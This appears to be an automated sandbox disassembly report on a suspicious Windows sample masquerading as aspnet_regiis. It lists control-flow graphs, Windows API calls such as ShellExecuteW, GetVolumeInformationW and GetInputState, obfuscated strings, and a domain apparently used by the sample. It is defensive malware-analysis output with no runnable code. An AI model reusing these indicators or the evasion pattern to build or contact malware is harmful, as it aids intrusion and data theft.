                                                                                      Signature Coverage:62.4%
                                                                                      Total number of Nodes:101
                                                                                      Total number of Limit Nodes:8
                                                                                      execution_graph 15446 58a429 15447 58a450 15446->15447 15447->15447 15448 58a47e SysAllocString 15447->15448 15449 58a510 15448->15449 15449->15449 15450 58a542 SysAllocString 15449->15450 15451 58a569 15450->15451 15452 58a7c0 15451->15452 15453 58a87d 15451->15453 15454 58a670 VariantInit 15451->15454 15455 58a810 VariantClear 15451->15455 15456 58a830 VariantClear 15451->15456 15457 58a870 SysFreeString 15451->15457 15458 58a8b0 SysFreeString 15451->15458 15459 58a851 SysFreeString 15451->15459 15460 58a891 SysFreeString 15451->15460 15461 58a5c0 VariantInit 15451->15461 15462 58a865 SysFreeString 15451->15462 15463 58a841 15451->15463 15464 58a8c1 15451->15464 15476 58a6d0 15451->15476 15453->15460 15454->15476 15467 58a821 15455->15467 15456->15463 15457->15453 15458->15464 15459->15462 15468 58a8a2 15460->15468 15475 58a620 15461->15475 15462->15457 15463->15459 15469 58a8df GetVolumeInformationW 15464->15469 15465 58a907 15465->15452 15466 58aab2 15465->15466 15474 58aa8e 15465->15474 15481 5907f0 LdrInitializeThunk 15465->15481 15470 58dac0 RtlFreeHeap 15466->15470 15467->15456 15468->15458 15469->15452 15469->15465 15469->15466 15469->15474 15477 58aab8 15470->15477 15474->15466 15482 58df20 15474->15482 15486 58dda0 15474->15486 15490 58dfe0 15474->15490 15475->15454 15476->15452 15476->15453 15476->15455 15476->15456 15476->15457 15476->15458 15476->15460 15476->15462 15476->15463 15476->15464 15476->15465 15476->15466 15476->15474 15477->15452 15480 5907f0 LdrInitializeThunk 15477->15480 15480->15452 15481->15474 15483 58dfae 15482->15483 15484 58df2a 15482->15484 15483->15474 15484->15483 15498 5907f0 LdrInitializeThunk 15484->15498 15487 58de7e 15486->15487 15488 58ddb2 15486->15488 15487->15474 15488->15487 15499 5907f0 LdrInitializeThunk 15488->15499 15491 58e080 15490->15491 15492 58dffa 15490->15492 15491->15474 15492->15491 15495 58e07e 15492->15495 15500 5907f0 LdrInitializeThunk 15492->15500 15494 58e17e 15494->15491 15494->15494 15502 5907f0 LdrInitializeThunk 15494->15502 15495->15494 15501 5907f0 LdrInitializeThunk 15495->15501 15498->15483 15499->15487 15500->15495 15501->15494 15502->15491 15503 590a8b 15504 590ab0 15503->15504 15504->15504 15505 590b0e 15504->15505 15509 5907f0 LdrInitializeThunk 15504->15509 15508 5907f0 LdrInitializeThunk 15505->15508 15508->15505 15509->15505 15420 5909fc 15422 590a40 15420->15422 15421 590d7e 15422->15421 15424 5907f0 LdrInitializeThunk 15422->15424 15424->15421 15510 55ce80 15513 55ce8c 15510->15513 15511 55d0a6 ExitProcess 15512 55d06f 15514 55d0a1 15512->15514 15515 55d078 GetCurrentThreadId GetInputState 15512->15515 15513->15511 15513->15512 15517 55d056 ShellExecuteW 15513->15517 15529 590710 15514->15529 15518 55d08e 15515->15518 15519 55d088 GetCurrentProcessId 15515->15519 15517->15512 15525 55df90 15518->15525 15519->15518 15521 55d093 15521->15514 15522 560b70 6 API calls 15521->15522 15523 55d09c 15522->15523 15524 55f8a0 FreeLibrary 15523->15524 15524->15514 15526 55dfc0 15525->15526 15526->15526 15527 55e08b LoadLibraryExW 15526->15527 15528 55e0a0 15527->15528 15532 591c40 15529->15532 15531 590715 FreeLibrary 15531->15511 15533 591c49 15532->15533 15533->15531 15534 55eca0 15537 55ece0 15534->15537 15535 55f19f 15536 58dac0 RtlFreeHeap 15536->15535 15537->15535 15537->15536 15537->15537 15538 55f620 15539 55f62b 15538->15539 15540 590730 2 API calls 15539->15540 15541 55f5f1 15539->15541 15540->15541 15425 58da90 RtlAllocateHeap 15431 55f759 15432 55f5f1 15431->15432 15434 55f646 15431->15434 15434->15432 15435 590730 15434->15435 15436 59075b RtlReAllocateHeap 15435->15436 15437 5907ca 15435->15437 15438 59074d 15435->15438 15439 5907d5 15435->15439 15436->15437 15437->15432 15438->15436 15438->15439 15442 58dac0 15439->15442 15443 58db80 15442->15443 15444 58dad8 15442->15444 15443->15437 15444->15444 15445 58db5d RtlFreeHeap 15444->15445 15445->15443 15542 5909a5 15543 5909ae GetForegroundWindow 15542->15543 15544 5909c1 15543->15544

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 58a429-58a448 1 58a450-58a47c 0->1 1->1 2 58a47e-58a504 SysAllocString 1->2 3 58a510-58a540 2->3 3->3 4 58a542-58a56e SysAllocString 3->4 6 58a5ba 4->6 7 58a7db-58a7e4 4->7 8 58a7fb-58a801 call 55c740 4->8 9 58a73c-58a74b 4->9 10 58a87d-58a883 4->10 11 58a670-58a6cf VariantInit 4->11 12 58a810-58a821 VariantClear 4->12 13 58a830-58a841 VariantClear 4->13 14 58a870-58a871 SysFreeString 4->14 15 58a8b0-58a8c1 SysFreeString 4->15 16 58a851-58a85b SysFreeString 4->16 17 58a891-58a8a2 SysFreeString 4->17 18 58a575-58a595 4->18 19 58a80a 4->19 20 58a7eb-58a7f1 4->20 21 58a5c0-58a61f VariantInit 4->21 22 58a7c0 4->22 23 58a722-58a735 4->23 24 58a7c2-58a7d4 4->24 25 58a865-58a86f SysFreeString 4->25 26 58a847-58a84d 4->26 27 58a8c7-58a900 call 593090 GetVolumeInformationW 4->27 6->21 7->7 7->8 7->10 7->12 7->13 7->14 7->15 7->17 7->19 7->20 7->22 7->24 7->25 7->26 7->27 28 58aa1e-58aa41 call 58da20 7->28 29 58ab90 7->29 30 58a9d7-58a9de 7->30 31 58aa17-58aa19 7->31 32 58a949 7->32 33 58a94c-58a98f call 582c70 7->33 34 58a9c4-58a9d0 7->34 35 58a907-58a919 7->35 36 58a9b0-58a9bd 7->36 37 58aab2-58aacb call 58dac0 7->37 38 58a936-58a942 7->38 39 58abac-58abfc call 58dd80 call 58dda0 7->39 40 58ab6f-58ab81 7->40 41 58a920 7->41 42 58a926-58a92f 7->42 8->19 47 58a74d-58a752 9->47 48 58a781-58a7b0 call 55c730 call 579c20 9->48 55 58a887 10->55 46 58a6d0-58a700 11->46 12->13 13->26 14->10 15->27 16->25 17->15 58 58a599-58a5b3 18->58 20->8 45 58a620-58a650 21->45 23->7 23->8 23->9 23->10 23->12 23->13 23->14 23->15 23->17 23->19 23->20 23->22 23->24 23->25 23->26 23->27 23->28 23->30 23->31 23->32 23->33 23->34 23->35 23->36 23->37 23->38 23->41 23->42 24->7 24->8 24->10 24->12 24->13 24->14 24->15 24->17 24->19 24->20 24->25 24->26 24->27 24->28 24->29 24->30 24->31 24->32 24->33 24->34 24->35 24->36 24->37 24->38 24->39 24->40 24->41 24->42 25->14 26->16 27->28 27->29 27->30 27->31 27->32 27->33 27->34 27->35 27->36 27->37 27->38 27->39 27->40 27->41 27->42 50 58ac03-58ac19 call 58dfe0 27->50 85 58aa50-58aa62 28->85 51 58ab93-58aba5 call 58df20 29->51 63 58ab2f-58ab36 31->63 32->33 82 58a990-58a998 33->82 34->28 34->29 34->30 34->31 34->32 34->33 34->34 34->36 34->37 34->38 34->39 34->40 34->41 34->42 34->50 35->28 35->29 35->30 35->31 35->32 35->33 35->34 35->36 35->37 35->38 35->39 35->40 35->41 35->42 35->50 36->28 36->29 36->31 36->34 36->36 36->37 36->39 36->40 36->50 77 58aad0-58aae4 37->77 38->28 38->29 38->31 38->32 38->33 38->34 38->36 38->37 38->39 38->40 38->50 39->29 39->50 40->29 40->37 40->39 40->50 42->28 42->29 42->31 42->32 42->33 42->34 42->36 42->37 42->38 42->39 42->40 42->50 45->45 60 58a652-58a66f 45->60 46->46 62 58a702-58a718 46->62 64 58a760-58a764 47->64 48->7 48->8 48->10 48->12 48->13 48->14 48->15 48->17 48->19 48->20 48->22 48->24 48->25 48->26 48->27 48->28 48->30 48->31 48->32 48->33 48->34 48->35 48->36 48->37 48->38 48->40 48->41 48->42 50->51 51->29 51->37 51->39 51->50 55->17 58->6 58->7 58->8 58->9 58->10 58->11 58->12 58->13 58->14 58->15 58->17 58->19 58->20 58->21 58->22 58->23 58->24 58->25 58->26 58->27 60->11 83 58a71c 62->83 73 58a754 64->73 74 58a766-58a76f 64->74 84 58a755-58a75e 73->84 86 58a771-58a774 74->86 87 58a776-58a77a 74->87 77->77 89 58aae6-58aaee 77->89 82->82 90 58a99a-58a9a4 82->90 83->23 84->48 84->64 85->85 92 58aa64-58aa6f 85->92 86->84 87->84 93 58a77c-58a77f 87->93 95 58ab2a-58ab2d 89->95 96 58aaf0-58aafb 89->96 90->28 90->29 90->31 90->34 90->36 90->37 90->39 90->40 90->50 97 58aa9c-58aaab 92->97 98 58aa71-58aa78 92->98 93->84 95->63 99 58ab00-58ab07 96->99 97->29 97->37 97->39 97->40 97->50 100 58aa80-58aa87 98->100 101 58ab09-58ab0c 99->101 102 58ab10-58ab16 99->102 103 58aa89-58aa8c 100->103 104 58aa90-58aa96 100->104 101->99 105 58ab0e 101->105 102->95 107 58ab18-58ab27 call 5907f0 102->107 103->100 108 58aa8e 103->108 104->97 106 58ab37-58ab68 call 5907f0 104->106 105->95 106->29 106->37 106->39 106->40 106->50 107->95 108->97
                                                                                      APIs
                                                                                      • SysAllocString.OLEAUT32(C965CB65), ref: 0058A483
                                                                                      • SysAllocString.OLEAUT32(73BF71A3), ref: 0058A547
                                                                                      • VariantInit.OLEAUT32(?), ref: 0058A5C5
                                                                                      • VariantInit.OLEAUT32(?), ref: 0058A675
                                                                                      • VariantClear.OLEAUT32(?), ref: 0058A811
                                                                                      • VariantClear.OLEAUT32(?), ref: 0058A831
                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058A855
                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058A866
                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058A871
                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058A892
                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058A8B1
                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0058A8F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Free$Variant$AllocClearInit$InformationVolume
                                                                                      • String ID: !$IK
                                                                                      • API String ID: 3953524707-496506819
                                                                                      • Opcode ID: badd5c4f4b37c9f170a5082b93f9fe3ed8c42ece6719f743e135e5b138f8647f
                                                                                      • Instruction ID: 20373eb07a309dc9746e0df4f655e497e21b10da3e070e29758b1474129be8ae
                                                                                      • Opcode Fuzzy Hash: badd5c4f4b37c9f170a5082b93f9fe3ed8c42ece6719f743e135e5b138f8647f
                                                                                      • Instruction Fuzzy Hash: AC121071A18301DFE704DF64D88576FBBB5FB99304F16882EE98697290D738D809CB92

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 113 560b70-560c7a CoInitialize 114 560fc6 CoUninitialize 113->114 115 560fd6-560ff9 GetSystemDirectoryW 113->115 116 560fb2-560fbf 113->116 117 560ca3-560cd5 call 58a260 113->117 118 560c81-560c9c CoInitializeSecurity 113->118 119 561041 113->119 120 560fcc-560fd5 113->120 114->120 121 561000 115->121 122 560ffb-560ffe 115->122 116->114 116->119 128 560ce0-560d1c 117->128 118->114 118->115 118->116 118->117 118->119 124 561001-561009 121->124 122->121 122->124 126 561010 124->126 127 56100b-56100e 124->127 129 561011-56101e call 55c730 call 58ad60 126->129 127->126 127->129 128->128 130 560d1e-560d6a 128->130 138 561023-56103a call 58dac0 129->138 132 560d70-560dac 130->132 132->132 134 560dae-560db3 132->134 136 560db5-560dc2 134->136 137 560ddd-560de6 134->137 139 560dd0-560dd9 136->139 140 560de9-560df3 137->140 138->114 138->119 139->139 142 560ddb 139->142 143 560df5-560df6 140->143 144 560e0b-560e14 140->144 142->140 146 560e00-560e09 143->146 147 560e16-560e19 144->147 148 560e2b-560e36 144->148 146->144 146->146 149 560e20-560e29 147->149 150 560e4b-560f0f 148->150 151 560e38-560e39 148->151 149->148 149->149 153 560f10-560f3b 150->153 152 560e40-560e49 151->152 152->150 152->152 153->153 154 560f3d-560f62 153->154 155 560f70-560f80 154->155 155->155 156 560f82-560fa0 call 55f8b0 155->156 158 560fa5-560fab 156->158 158->114 158->115 158->116 158->119
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00560C71
                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00560C93
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00560FE1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize$DirectorySecuritySystem
                                                                                      • String ID: 0C3119F82F2B722B2A3117AA92805AE5$=g$n&b$sergei-esenin.com$vr$}t$~{
                                                                                      • API String ID: 1379780170-2408420023
                                                                                      • Opcode ID: 00825fc6e70f1ba971df853555e0c2e6070b2d4f8916177cb7c8b82034e215f8
                                                                                      • Instruction ID: 2d25386a4b3785857f3fc326965241e2d17b57c197d6b4bab9e9d511e1162e49
                                                                                      • Opcode Fuzzy Hash: 00825fc6e70f1ba971df853555e0c2e6070b2d4f8916177cb7c8b82034e215f8
                                                                                      • Instruction Fuzzy Hash: 74D1BFB09107409FD7209F39C896B56BFF0FB56310F1446ADE8D68F696E3359809CB92

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 159 55ce80-55ce8e call 58f5d0 162 55ce94-55cea4 159->162 163 55d0a6-55d0a8 ExitProcess 159->163 164 55ceb0-55cec3 162->164 164->164 165 55cec5-55cf4b 164->165 166 55cf50-55cf76 165->166 166->166 167 55cf78-55cf7d 166->167 168 55cf83-55cfbf 167->168 169 55d06f-55d076 call 587730 167->169 170 55cfc0-55d007 168->170 175 55d0a1 call 590710 169->175 176 55d078-55d086 GetCurrentThreadId GetInputState 169->176 170->170 172 55d009-55d02f 170->172 174 55d030-55d054 172->174 174->174 178 55d056-55d069 ShellExecuteW 174->178 175->163 179 55d08e-55d095 call 55df90 176->179 180 55d088 GetCurrentProcessId 176->180 178->169 179->175 183 55d097 call 560b70 179->183 180->179 185 55d09c call 55f8a0 183->185 185->175
                                                                                      APIs
                                                                                      • ShellExecuteW.SHELL32(00000000,61F667F5,005973DA,?,00000000,00000005), ref: 0055D069
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0055D078
                                                                                      • GetInputState.USER32 ref: 0055D07E
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0055D088
                                                                                      • ExitProcess.KERNEL32 ref: 0055D0A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess$ExecuteExitInputShellStateThread
                                                                                      • String ID: \_
                                                                                      • API String ID: 288744916-2885897410
                                                                                      • Opcode ID: 2c81bdfdd7e56bf7c21de24d5dac7be5c1014d4182496115060d8a9e6c07c834
                                                                                      • Instruction ID: 5377b241ffa1c05049fbaef30f8f9386e1e29f35a43a901905bcaefac632aaf2
                                                                                      • Opcode Fuzzy Hash: 2c81bdfdd7e56bf7c21de24d5dac7be5c1014d4182496115060d8a9e6c07c834
                                                                                      • Instruction Fuzzy Hash: 4A5159326593014BD718AF359D2A36F7FD2EFC1314F19C52DE4829B2D1E678880A8B96

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 272 5909fc-590a3b 273 590a40-590a54 272->273 273->273 274 590a56-590a62 273->274 275 590a81-590c9b call 58f330 274->275 276 590a64-590a68 274->276 281 590c9d 275->281 282 590cb1-590d1f 275->282 277 590a70-590a7f 276->277 277->275 277->277 283 590ca0-590caf 281->283 284 590d20-590d55 282->284 283->282 283->283 284->284 285 590d57-590d62 284->285 286 590da5-590dbe 285->286 287 590d64-590d6f 285->287 288 590d70-590d77 287->288 289 590d79-590d7c 288->289 290 590d80-590d86 288->290 289->288 291 590d7e 289->291 290->286 292 590d88-590d9d call 5907f0 290->292 291->286 294 590da2 292->294 294->286
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$[e\c$t}Z
                                                                                      • API String ID: 0-3149312526
                                                                                      • Opcode ID: f4a1e0e522de8a1a4085f393c9a65e58d3988404a65b6e0dd7983f4d9ccdd91f
                                                                                      • Instruction ID: 6d68472da6f87c8f5921587e2da9de42e47ebafd070422d46986e93a76625d6f
                                                                                      • Opcode Fuzzy Hash: f4a1e0e522de8a1a4085f393c9a65e58d3988404a65b6e0dd7983f4d9ccdd91f
                                                                                      • Instruction Fuzzy Hash: 0F419D705183428FDB14DF28C45167BBBE1FFD5308F18691DE0869B291DB348946CB8A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 308 58a260-58a2b4 309 58a2c0-58a2e6 308->309 309->309 310 58a2e8-58a305 309->310 312 58a30c 310->312 313 58a317-58a368 CoCreateInstance 310->313 312->313 313->312 313->313
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00596B30,00000000,00000001,00596B20,00000000), ref: 0058A35D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: 77ddc0e0126c9a901999dc1692095873b7a4995789f55eabd908d6ee195275be
                                                                                      • Instruction ID: 4341d8b85b67559c6ee3d4882bf48131b6526dfae031502e647209f5d8c938e8
                                                                                      • Opcode Fuzzy Hash: 77ddc0e0126c9a901999dc1692095873b7a4995789f55eabd908d6ee195275be
                                                                                      • Instruction Fuzzy Hash: 4521B6B1158300AFE320CF24E844B5BBBE4FBD6744F00890DF1D85A280DBB58508CB92

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 314 590730-590746 315 59075b-59076f 314->315 316 5907ca-5907d3 call 58da20 314->316 317 59074d-590754 314->317 318 5907d5-5907de call 58dac0 314->318 321 590770-5907b3 315->321 326 5907e3-5907e7 316->326 317->315 317->318 325 5907e0 318->325 321->321 322 5907b5-5907c8 RtlReAllocateHeap 321->322 322->325 325->326
                                                                                      APIs
                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?), ref: 005907C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 706e5e5846650cf2ca6f212dc39787022f5467f79a6f6a9bbc7c38991383e79a
                                                                                      • Instruction ID: 6d434d5750023a91209064a43987b452cde3111f9a6ee521175c4333dcc6582a
                                                                                      • Opcode Fuzzy Hash: 706e5e5846650cf2ca6f212dc39787022f5467f79a6f6a9bbc7c38991383e79a
                                                                                      • Instruction Fuzzy Hash: 55119C3275D3058BE3145A78ACD262FBBAAFBD5214F1D453CE880936C0D175A80553E1
                                                                                      APIs
                                                                                      • LdrInitializeThunk.NTDLL(00593C9A,005C003F,00000006,?,?,00000018,?,?,?), ref: 0059081E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                      • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                      • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                      • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: MJKH
                                                                                      • API String ID: 2994545307-1589446790
                                                                                      • Opcode ID: 70a5d042af1a801f2c2c5a1c5e96a414b94af2eba03ab2ff1993e2ab159f96a5
                                                                                      • Instruction ID: 5f2591c5ac06be1f9af4290161c27fd8ee8821696a9126e3c8551a663e6f608d
                                                                                      • Opcode Fuzzy Hash: 70a5d042af1a801f2c2c5a1c5e96a414b94af2eba03ab2ff1993e2ab159f96a5
                                                                                      • Instruction Fuzzy Hash: 133124303483539FEB24CB18CC5962A7B93FBC531AF298929E052E72D4DF309456DB89
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bfa3dbbb902979361623085a8d6bf3a4f5a808abbed0425b5531a8f69f9c78ee
                                                                                      • Instruction ID: 7ed4fdcbb296056bb7841900e1c309849e54f625e24456734847dee974b948f4
                                                                                      • Opcode Fuzzy Hash: bfa3dbbb902979361623085a8d6bf3a4f5a808abbed0425b5531a8f69f9c78ee
                                                                                      • Instruction Fuzzy Hash: 720239366087518FCB18CF28D891129BBE1FB9A314F0A8A7ED896C7391D734E945DB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e95a682713fb36379ed0b273e766bbc5e2ddb5099d14bae877f99eba9e9d4db0
                                                                                      • Instruction ID: 391b2c460cab2ccd826cd198101ec5d1786700773442ead789b550e625f9d816
                                                                                      • Opcode Fuzzy Hash: e95a682713fb36379ed0b273e766bbc5e2ddb5099d14bae877f99eba9e9d4db0
                                                                                      • Instruction Fuzzy Hash: C721F034388301AFE720CA19CDC1B2677A7BBD5301F29A82CE591A72C5CAB0E8069B51

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 295 55df90-55dfbf 296 55dfc0-55dfdd 295->296 296->296 297 55dfdf-55e027 296->297 298 55e030-55e089 297->298 298->298 299 55e08b-55e09b LoadLibraryExW call 58f310 298->299 301 55e0a0-55e0b7 299->301
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(77DF0993,00000000,83828980), ref: 0055E093
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
